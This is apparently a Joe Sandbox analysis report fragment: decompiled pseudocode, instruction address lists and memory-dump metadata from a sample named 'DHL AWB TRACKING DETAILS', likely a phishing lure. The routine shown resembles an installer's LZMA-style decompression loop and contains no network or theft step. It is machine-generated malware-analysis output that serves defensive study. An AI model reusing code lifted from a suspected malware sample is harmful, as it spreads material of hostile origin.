                    													__eflags = __edx;
                    													 *__esi = __ax;
                    													 *(__ebp - 0x50) = __edx;
                    												} else {
                    													 *(__ebp - 0x10) = __ecx;
                    													0x800 = 0x800 - __edi;
                    													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                    													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                    													 *__esi = __cx;
                    												}
                    												__eflags =  *(__ebp - 0x10) - 0x1000000;
                    												if( *(__ebp - 0x10) >= 0x1000000) {
                    													goto L148;
                    												} else {
                    													goto L146;
                    												}
                    											case 0x19:
                    												__eflags = __ebx - 4;
                    												if(__ebx < 4) {
                    													 *(__ebp - 0x2c) = __ebx;
                    													L119:
                    													_t393 = __ebp - 0x2c;
                    													 *_t393 =  *(__ebp - 0x2c) + 1;
                    													__eflags =  *_t393;
                    													L120:
                    													__eax =  *(__ebp - 0x2c);
                    													__eflags = __eax;
                    													if(__eax == 0) {
                    														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                    														goto L170;
                    													}
                    													__eflags = __eax -  *(__ebp - 0x60);
                    													if(__eax >  *(__ebp - 0x60)) {
                    														goto L171;
                    													}
                    													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                    													__eax =  *(__ebp - 0x30);
                    													_t400 = __ebp - 0x60;
                    													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                    													__eflags =  *_t400;
                    													goto L123;
                    												}
                    												__ecx = __ebx;
                    												__eax = __ebx;
                    												__ecx = __ebx >> 1;
                    												__eax = __ebx & 0x00000001;
                    												__ecx = (__ebx >> 1) - 1;
                    												__al = __al | 0x00000002;
                    												__eax = (__ebx & 0x00000001) << __cl;
                    												__eflags = __ebx - 0xe;
                    												 *(__ebp - 0x2c) = __eax;
                    												if(__ebx >= 0xe) {
                    													__ebx = 0;
                    													 *(__ebp - 0x48) = __ecx;
                    													L102:
                    													__eflags =  *(__ebp - 0x48);
                    													if( *(__ebp - 0x48) <= 0) {
                    														__eax = __eax + __ebx;
                    														 *(__ebp - 0x40) = 4;
                    														 *(__ebp - 0x2c) = __eax;
                    														__eax =  *(__ebp - 4);
                    														__eax =  *(__ebp - 4) + 0x644;
                    														__eflags = __eax;
                    														L108:
                    														__ebx = 0;
                    														 *(__ebp - 0x58) = __eax;
                    														 *(__ebp - 0x50) = 1;
                    														 *(__ebp - 0x44) = 0;
                    														 *(__ebp - 0x48) = 0;
                    														L112:
                    														__eax =  *(__ebp - 0x40);
                    														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                    														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                    															_t391 = __ebp - 0x2c;
                    															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                    															__eflags =  *_t391;
                    															goto L119;
                    														}
                    														__eax =  *(__ebp - 0x50);
                    														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                    														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                    														__eax =  *(__ebp - 0x58);
                    														__esi = __edi + __eax;
                    														 *(__ebp - 0x54) = __esi;
                    														__ax =  *__esi;
                    														__ecx = __ax & 0x0000ffff;
                    														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                    														__eflags =  *(__ebp - 0xc) - __edx;
                    														if( *(__ebp - 0xc) >= __edx) {
                    															__ecx = 0;
                    															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                    															__ecx = 1;
                    															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                    															__ebx = 1;
                    															__ecx =  *(__ebp - 0x48);
                    															__ebx = 1 << __cl;
                    															__ecx = 1 << __cl;
                    															__ebx =  *(__ebp - 0x44);
                    															__ebx =  *(__ebp - 0x44) | __ecx;
                    															__cx = __ax;
                    															__cx = __ax >> 5;
                    															__eax = __eax - __ecx;
                    															__edi = __edi + 1;
                    															__eflags = __edi;
                    															 *(__ebp - 0x44) = __ebx;
                    															 *__esi = __ax;
                    															 *(__ebp - 0x50) = __edi;
                    														} else {
                    															 *(__ebp - 0x10) = __edx;
                    															0x800 = 0x800 - __ecx;
                    															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                    															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                    															 *__esi = __dx;
                    														}
                    														__eflags =  *(__ebp - 0x10) - 0x1000000;
                    														if( *(__ebp - 0x10) >= 0x1000000) {
                    															L111:
                    															_t368 = __ebp - 0x48;
                    															 *_t368 =  *(__ebp - 0x48) + 1;
                    															__eflags =  *_t368;
                    															goto L112;
                    														} else {
                    															goto L109;
                    														}
                    													}
                    													__ecx =  *(__ebp - 0xc);
                    													__ebx = __ebx + __ebx;
                    													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                    													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                    													 *(__ebp - 0x44) = __ebx;
                    													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                    														__ecx =  *(__ebp - 0x10);
                    														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                    														__ebx = __ebx | 0x00000001;
                    														__eflags = __ebx;
                    														 *(__ebp - 0x44) = __ebx;
                    													}
                    													__eflags =  *(__ebp - 0x10) - 0x1000000;
                    													if( *(__ebp - 0x10) >= 0x1000000) {
                    														L101:
                    														_t338 = __ebp - 0x48;
                    														 *_t338 =  *(__ebp - 0x48) - 1;
                    														__eflags =  *_t338;
                    														goto L102;
                    													} else {
                    														goto L99;
                    													}
                    												}
                    												__edx =  *(__ebp - 4);
                    												__eax = __eax - __ebx;
                    												 *(__ebp - 0x40) = __ecx;
                    												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                    												goto L108;
                    											case 0x1a:
                    												L56:
                    												__eflags =  *(__ebp - 0x64);
                    												if( *(__ebp - 0x64) == 0) {
                    													 *(__ebp - 0x88) = 0x1a;
                    													goto L170;
                    												}
                    												__ecx =  *(__ebp - 0x68);
                    												__al =  *(__ebp - 0x5c);
                    												__edx =  *(__ebp - 8);
                    												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                    												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                    												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                    												 *( *(__ebp - 0x68)) = __al;
                    												__ecx =  *(__ebp - 0x14);
                    												 *(__ecx +  *(__ebp - 8)) = __al;
                    												__eax = __ecx + 1;
                    												__edx = 0;
                    												_t192 = __eax %  *(__ebp - 0x74);
                    												__eax = __eax /  *(__ebp - 0x74);
                    												__edx = _t192;
                    												goto L79;
                    											case 0x1b:
                    												L75:
                    												__eflags =  *(__ebp - 0x64);
                    												if( *(__ebp - 0x64) == 0) {
                    													 *(__ebp - 0x88) = 0x1b;
                    													goto L170;
                    												}
                    												__eax =  *(__ebp - 0x14);
                    												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                    												__eflags = __eax -  *(__ebp - 0x74);
                    												if(__eax >=  *(__ebp - 0x74)) {
                    													__eax = __eax +  *(__ebp - 0x74);
                    													__eflags = __eax;
                    												}
                    												__edx =  *(__ebp - 8);
                    												__cl =  *(__eax + __edx);
                    												__eax =  *(__ebp - 0x14);
                    												 *(__ebp - 0x5c) = __cl;
                    												 *(__eax + __edx) = __cl;
                    												__eax = __eax + 1;
                    												__edx = 0;
                    												_t274 = __eax %  *(__ebp - 0x74);
                    												__eax = __eax /  *(__ebp - 0x74);
                    												__edx = _t274;
                    												__eax =  *(__ebp - 0x68);
                    												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                    												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                    												_t283 = __ebp - 0x64;
                    												 *_t283 =  *(__ebp - 0x64) - 1;
                    												__eflags =  *_t283;
                    												 *( *(__ebp - 0x68)) = __cl;
                    												L79:
                    												 *(__ebp - 0x14) = __edx;
                    												goto L80;
                    											case 0x1c:
                    												while(1) {
                    													L123:
                    													__eflags =  *(__ebp - 0x64);
                    													if( *(__ebp - 0x64) == 0) {
                    														break;
                    													}
                    													__eax =  *(__ebp - 0x14);
                    													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                    													__eflags = __eax -  *(__ebp - 0x74);
                    													if(__eax >=  *(__ebp - 0x74)) {
                    														__eax = __eax +  *(__ebp - 0x74);
                    														__eflags = __eax;
                    													}
                    													__edx =  *(__ebp - 8);
                    													__cl =  *(__eax + __edx);
                    													__eax =  *(__ebp - 0x14);
                    													 *(__ebp - 0x5c) = __cl;
                    													 *(__eax + __edx) = __cl;
                    													__eax = __eax + 1;
                    													__edx = 0;
                    													_t414 = __eax %  *(__ebp - 0x74);
                    													__eax = __eax /  *(__ebp - 0x74);
                    													__edx = _t414;
                    													__eax =  *(__ebp - 0x68);
                    													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                    													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                    													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                    													__eflags =  *(__ebp - 0x30);
                    													 *( *(__ebp - 0x68)) = __cl;
                    													 *(__ebp - 0x14) = _t414;
                    													if( *(__ebp - 0x30) > 0) {
                    														continue;
                    													} else {
                    														L80:
                    														 *(__ebp - 0x88) = 2;
                    														goto L1;
                    													}
                    												}
                    												 *(__ebp - 0x88) = 0x1c;
                    												goto L170;
                    										}
                    									}
                    									L171:
                    									_t544 = _t543 | 0xffffffff;
                    									goto L172;
                    								}
                    							}
                    						}
                    					}
                    					goto L1;
                    				}
                    			}














                    0x004067c6
                    0x004067c9
                    0x004067cc
                    0x004067cf
                    0x004067d2
                    0x004067d5
                    0x004067d8
                    0x004067db
                    0x004067f4
                    0x004067f7
                    0x004067fa
                    0x004067fd
                    0x00406801
                    0x00406803
                    0x00406803
                    0x00406804
                    0x00406807
                    0x004067dd
                    0x004067dd
                    0x004067e5
                    0x004067ea
                    0x004067ec
                    0x004067ef
                    0x004067ef
                    0x0040680a
                    0x00406811
                    0x00000000
                    0x00406813
                    0x00000000
                    0x00406813
                    0x00000000
                    0x004064af
                    0x004064b2
                    0x004064e8
                    0x00406618
                    0x00406618
                    0x00406618
                    0x00406618
                    0x0040661b
                    0x0040661b
                    0x0040661e
                    0x00406620
                    0x004068aa
                    0x00000000
                    0x004068aa
                    0x00406626
                    0x00406629
                    0x00000000
                    0x00000000
                    0x0040662f
                    0x00406633
                    0x00406636
                    0x00406636
                    0x00406636
                    0x00000000
                    0x00406636
                    0x004064b4
                    0x004064b6
                    0x004064b8
                    0x004064ba
                    0x004064bd
                    0x004064be
                    0x004064c0
                    0x004064c2
                    0x004064c5
                    0x004064c8
                    0x004064de
                    0x004064e3
                    0x0040651b
                    0x0040651b
                    0x0040651f
                    0x0040654b
                    0x0040654d
                    0x00406554
                    0x00406557
                    0x0040655a
                    0x0040655a
                    0x0040655f
                    0x0040655f
                    0x00406561
                    0x00406564
                    0x0040656b
                    0x0040656e
                    0x0040659b
                    0x0040659b
                    0x0040659e
                    0x004065a1
                    0x00406615
                    0x00406615
                    0x00406615
                    0x00000000
                    0x00406615
                    0x004065a3
                    0x004065a9
                    0x004065ac
                    0x004065af
                    0x004065b2
                    0x004065b5
                    0x004065b8
                    0x004065bb
                    0x004065be
                    0x004065c1
                    0x004065c4
                    0x004065dd
                    0x004065df
                    0x004065e2
                    0x004065e3
                    0x004065e6
                    0x004065e8
                    0x004065eb
                    0x004065ed
                    0x004065ef
                    0x004065f2
                    0x004065f4
                    0x004065f7
                    0x004065fb
                    0x004065fd
                    0x004065fd
                    0x004065fe
                    0x00406601
                    0x00406604
                    0x004065c6
                    0x004065c6
                    0x004065ce
                    0x004065d3
                    0x004065d5
                    0x004065d8
                    0x004065d8
                    0x00406607
                    0x0040660e
                    0x00406598
                    0x00406598
                    0x00406598
                    0x00406598
                    0x00000000
                    0x00406610
                    0x00000000
                    0x00406610
                    0x0040660e
                    0x00406521
                    0x00406524
                    0x00406526
                    0x00406529
                    0x0040652c
                    0x0040652f
                    0x00406531
                    0x00406534
                    0x00406537
                    0x00406537
                    0x0040653a
                    0x0040653a
                    0x0040653d
                    0x00406544
                    0x00406518
                    0x00406518
                    0x00406518
                    0x00406518
                    0x00000000
                    0x00406546
                    0x00000000
                    0x00406546
                    0x00406544
                    0x004064ca
                    0x004064cd
                    0x004064cf
                    0x004064d2
                    0x00000000
                    0x00000000
                    0x00406231
                    0x00406231
                    0x00406235
                    0x0040687a
                    0x00000000
                    0x0040687a
                    0x0040623b
                    0x0040623e
                    0x00406241
                    0x00406244
                    0x00406247
                    0x0040624a
                    0x0040624d
                    0x0040624f
                    0x00406252
                    0x00406255
                    0x00406258
                    0x0040625a
                    0x0040625a
                    0x0040625a
                    0x00000000
                    0x00000000
                    0x004063bc
                    0x004063bc
                    0x004063c0
                    0x00406886
                    0x00000000
                    0x00406886
                    0x004063c6
                    0x004063c9
                    0x004063cc
                    0x004063cf
                    0x004063d1
                    0x004063d1
                    0x004063d1
                    0x004063d4
                    0x004063d7
                    0x004063da
                    0x004063dd
                    0x004063e0
                    0x004063e3
                    0x004063e4
                    0x004063e6
                    0x004063e6
                    0x004063e6
                    0x004063e9
                    0x004063ec
                    0x004063ef
                    0x004063f2
                    0x004063f2
                    0x004063f2
                    0x004063f5
                    0x004063f7
                    0x004063f7
                    0x00000000
                    0x00000000
                    0x00406639
                    0x00406639
                    0x00406639
                    0x0040663d
                    0x00000000
                    0x00000000
                    0x00406643
                    0x00406646
                    0x00406649
                    0x0040664c
                    0x0040664e
                    0x0040664e
                    0x0040664e
                    0x00406651
                    0x00406654
                    0x00406657
                    0x0040665a
                    0x0040665d
                    0x00406660
                    0x00406661
                    0x00406663
                    0x00406663
                    0x00406663
                    0x00406666
                    0x00406669
                    0x0040666c
                    0x0040666f
                    0x00406672
                    0x00406676
                    0x00406678
                    0x0040667b
                    0x00000000
                    0x0040667d
                    0x004063fa
                    0x004063fa
                    0x00000000
                    0x004063fa
                    0x0040667b
                    0x004068b0
                    0x00000000
                    0x00000000
                    0x00405edf
                    0x004068e7
                    0x004068e7
                    0x00000000
                    0x004068e7
                    0x00406734
                    0x004066bb
                    0x004066b8
                    0x00000000
                    0x004062ef

                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 25af1c67d90c65bbedd3736b3b8ac70fc4bdcff7d4c70ba7fb1a825d48c8a324
                    • Instruction ID: 4708b7c85b45d81bde2c34293bfadd2d5d28089b3d5bcf645a888e2e7e0fcfc2
                    • Opcode Fuzzy Hash: 25af1c67d90c65bbedd3736b3b8ac70fc4bdcff7d4c70ba7fb1a825d48c8a324
                    • Instruction Fuzzy Hash: 91711371D00229DFDF24CFA8C844BADBBB1FB44305F15816AD816B7281D7389996DF54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 98%
                    			E00406409() {
                    				unsigned short _t531;
                    				signed int _t532;
                    				void _t533;
                    				signed int _t534;
                    				signed int _t535;
                    				signed int _t565;
                    				signed int _t568;
                    				signed int _t589;
                    				signed int* _t606;
                    				void* _t613;
                    
                    				L0:
                    				while(1) {
                    					L0:
                    					if( *(_t613 - 0x40) != 0) {
                    						 *(_t613 - 0x84) = 0xb;
                    						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
                    						goto L132;
                    					} else {
                    						__eax =  *(__ebp - 0x28);
                    						L88:
                    						 *(__ebp - 0x2c) = __eax;
                    						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                    						L89:
                    						__eax =  *(__ebp - 4);
                    						 *(__ebp - 0x80) = 0x15;
                    						__eax =  *(__ebp - 4) + 0xa68;
                    						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                    						L69:
                    						 *(__ebp - 0x84) = 0x12;
                    						while(1) {
                    							L132:
                    							 *(_t613 - 0x54) = _t606;
                    							while(1) {
                    								L133:
                    								_t531 =  *_t606;
                    								_t589 = _t531 & 0x0000ffff;
                    								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                    								if( *(_t613 - 0xc) >= _t565) {
                    									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                    									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                    									 *(_t613 - 0x40) = 1;
                    									_t532 = _t531 - (_t531 >> 5);
                    									 *_t606 = _t532;
                    								} else {
                    									 *(_t613 - 0x10) = _t565;
                    									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                    									 *_t606 = (0x800 - _t589 >> 5) + _t531;
                    								}
                    								if( *(_t613 - 0x10) >= 0x1000000) {
                    									goto L139;
                    								}
                    								L137:
                    								if( *(_t613 - 0x6c) == 0) {
                    									 *(_t613 - 0x88) = 5;
                    									L170:
                    									_t568 = 0x22;
                    									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                    									_t535 = 0;
                    									L172:
                    									return _t535;
                    								}
                    								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                    								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                    								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                    								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                    								L139:
                    								_t533 =  *(_t613 - 0x84);
                    								while(1) {
                    									 *(_t613 - 0x88) = _t533;
                    									while(1) {
                    										L1:
                    										_t534 =  *(_t613 - 0x88);
                    										if(_t534 > 0x1c) {
                    											break;
                    										}
                    										switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
                    											case 0:
                    												if( *(_t613 - 0x6c) == 0) {
                    													goto L170;
                    												}
                    												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                    												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                    												_t534 =  *( *(_t613 - 0x70));
                    												if(_t534 > 0xe1) {
                    													goto L171;
                    												}
                    												_t538 = _t534 & 0x000000ff;
                    												_push(0x2d);
                    												asm("cdq");
                    												_pop(_t570);
                    												_push(9);
                    												_pop(_t571);
                    												_t609 = _t538 / _t570;
                    												_t540 = _t538 % _t570 & 0x000000ff;
                    												asm("cdq");
                    												_t604 = _t540 % _t571 & 0x000000ff;
                    												 *(_t613 - 0x3c) = _t604;
                    												 *(_t613 - 0x1c) = (1 << _t609) - 1;
                    												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                    												_t612 = (0x300 << _t604 + _t609) + 0x736;
                    												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                    													L10:
                    													if(_t612 == 0) {
                    														L12:
                    														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                    														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                    														goto L15;
                    													} else {
                    														goto L11;
                    													}
                    													do {
                    														L11:
                    														_t612 = _t612 - 1;
                    														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                    													} while (_t612 != 0);
                    													goto L12;
                    												}
                    												if( *(_t613 - 4) != 0) {
                    													GlobalFree( *(_t613 - 4));
                    												}
                    												_t534 = GlobalAlloc(0x40, 0x600); // executed
                    												 *(_t613 - 4) = _t534;
                    												if(_t534 == 0) {
                    													goto L171;
                    												} else {
                    													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                    													goto L10;
                    												}
                    											case 1:
                    												L13:
                    												__eflags =  *(_t613 - 0x6c);
                    												if( *(_t613 - 0x6c) == 0) {
                    													 *(_t613 - 0x88) = 1;
                    													goto L170;
                    												}
                    												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                    												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                    												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                    												_t45 = _t613 - 0x48;
                    												 *_t45 =  *(_t613 - 0x48) + 1;
                    												__eflags =  *_t45;
                    												L15:
                    												if( *(_t613 - 0x48) < 4) {
                    													goto L13;
                    												}
                    												_t546 =  *(_t613 - 0x40);
                    												if(_t546 ==  *(_t613 - 0x74)) {
                    													L20:
                    													 *(_t613 - 0x48) = 5;
                    													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                    													goto L23;
                    												}
                    												 *(_t613 - 0x74) = _t546;
                    												if( *(_t613 - 8) != 0) {
                    													GlobalFree( *(_t613 - 8));
                    												}
                    												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                    												 *(_t613 - 8) = _t534;
                    												if(_t534 == 0) {
                    													goto L171;
                    												} else {
                    													goto L20;
                    												}
                    											case 2:
                    												L24:
                    												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                    												 *(_t613 - 0x84) = 6;
                    												 *(_t613 - 0x4c) = _t553;
                    												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                    												L132:
                    												 *(_t613 - 0x54) = _t606;
                    												goto L133;
                    											case 3:
                    												L21:
                    												__eflags =  *(_t613 - 0x6c);
                    												if( *(_t613 - 0x6c) == 0) {
                    													 *(_t613 - 0x88) = 3;
                    													goto L170;
                    												}
                    												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                    												_t67 = _t613 - 0x70;
                    												 *_t67 =  &(( *(_t613 - 0x70))[1]);
                    												__eflags =  *_t67;
                    												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                    												L23:
                    												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                    												if( *(_t613 - 0x48) != 0) {
                    													goto L21;
                    												}
                    												goto L24;
                    											case 4:
                    												L133:
                    												_t531 =  *_t606;
                    												_t589 = _t531 & 0x0000ffff;
                    												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                    												if( *(_t613 - 0xc) >= _t565) {
                    													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                    													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                    													 *(_t613 - 0x40) = 1;
                    													_t532 = _t531 - (_t531 >> 5);
                    													 *_t606 = _t532;
                    												} else {
                    													 *(_t613 - 0x10) = _t565;
                    													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                    													 *_t606 = (0x800 - _t589 >> 5) + _t531;
                    												}
                    												if( *(_t613 - 0x10) >= 0x1000000) {
                    													goto L139;
                    												}
                    											case 5:
                    												goto L137;
                    											case 6:
                    												__edx = 0;
                    												__eflags =  *(__ebp - 0x40);
                    												if( *(__ebp - 0x40) != 0) {
                    													__eax =  *(__ebp - 4);
                    													__ecx =  *(__ebp - 0x38);
                    													 *(__ebp - 0x34) = 1;
                    													 *(__ebp - 0x84) = 7;
                    													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                    													while(1) {
                    														L132:
                    														 *(_t613 - 0x54) = _t606;
                    														goto L133;
                    													}
                    												}
                    												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                    												__esi =  *(__ebp - 0x60);
                    												__cl = 8;
                    												__cl = 8 -  *(__ebp - 0x3c);
                    												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                    												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                    												__ecx =  *(__ebp - 0x3c);
                    												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                    												__ecx =  *(__ebp - 4);
                    												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                    												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                    												__eflags =  *(__ebp - 0x38) - 4;
                    												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                    												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                    												if( *(__ebp - 0x38) >= 4) {
                    													__eflags =  *(__ebp - 0x38) - 0xa;
                    													if( *(__ebp - 0x38) >= 0xa) {
                    														_t98 = __ebp - 0x38;
                    														 *_t98 =  *(__ebp - 0x38) - 6;
                    														__eflags =  *_t98;
                    													} else {
                    														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                    													}
                    												} else {
                    													 *(__ebp - 0x38) = 0;
                    												}
                    												__eflags =  *(__ebp - 0x34) - __edx;
                    												if( *(__ebp - 0x34) == __edx) {
                    													__ebx = 0;
                    													__ebx = 1;
                    													goto L61;
                    												} else {
                    													__eax =  *(__ebp - 0x14);
                    													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                    													__eflags = __eax -  *(__ebp - 0x74);
                    													if(__eax >=  *(__ebp - 0x74)) {
                    														__eax = __eax +  *(__ebp - 0x74);
                    														__eflags = __eax;
                    													}
                    													__ecx =  *(__ebp - 8);
                    													__ebx = 0;
                    													__ebx = 1;
                    													__al =  *((intOrPtr*)(__eax + __ecx));
                    													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                    													goto L41;
                    												}
                    											case 7:
                    												__eflags =  *(__ebp - 0x40) - 1;
                    												if( *(__ebp - 0x40) != 1) {
                    													__eax =  *(__ebp - 0x24);
                    													 *(__ebp - 0x80) = 0x16;
                    													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                    													__eax =  *(__ebp - 0x28);
                    													 *(__ebp - 0x24) =  *(__ebp - 0x28);
                    													__eax =  *(__ebp - 0x2c);
                    													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                    													__eax = 0;
                    													__eflags =  *(__ebp - 0x38) - 7;
                    													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                    													__al = __al & 0x000000fd;
                    													__eax = (__eflags >= 0) - 1 + 0xa;
                    													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                    													__eax =  *(__ebp - 4);
                    													__eax =  *(__ebp - 4) + 0x664;
                    													__eflags = __eax;
                    													 *(__ebp - 0x58) = __eax;
                    													goto L69;
                    												}
                    												__eax =  *(__ebp - 4);
                    												__ecx =  *(__ebp - 0x38);
                    												 *(__ebp - 0x84) = 8;
                    												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                    												while(1) {
                    													L132:
                    													 *(_t613 - 0x54) = _t606;
                    													goto L133;
                    												}
                    											case 8:
                    												__eflags =  *(__ebp - 0x40);
                    												if( *(__ebp - 0x40) != 0) {
                    													__eax =  *(__ebp - 4);
                    													__ecx =  *(__ebp - 0x38);
                    													 *(__ebp - 0x84) = 0xa;
                    													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                    												} else {
                    													__eax =  *(__ebp - 0x38);
                    													__ecx =  *(__ebp - 4);
                    													__eax =  *(__ebp - 0x38) + 0xf;
                    													 *(__ebp - 0x84) = 9;
                    													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                    													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                    												}
                    												while(1) {
                    													L132:
                    													 *(_t613 - 0x54) = _t606;
                    													goto L133;
                    												}
                    											case 9:
                    												__eflags =  *(__ebp - 0x40);
                    												if( *(__ebp - 0x40) != 0) {
                    													goto L89;
                    												}
                    												__eflags =  *(__ebp - 0x60);
                    												if( *(__ebp - 0x60) == 0) {
                    													goto L171;
                    												}
                    												__eax = 0;
                    												__eflags =  *(__ebp - 0x38) - 7;
                    												_t259 =  *(__ebp - 0x38) - 7 >= 0;
                    												__eflags = _t259;
                    												0 | _t259 = _t259 + _t259 + 9;
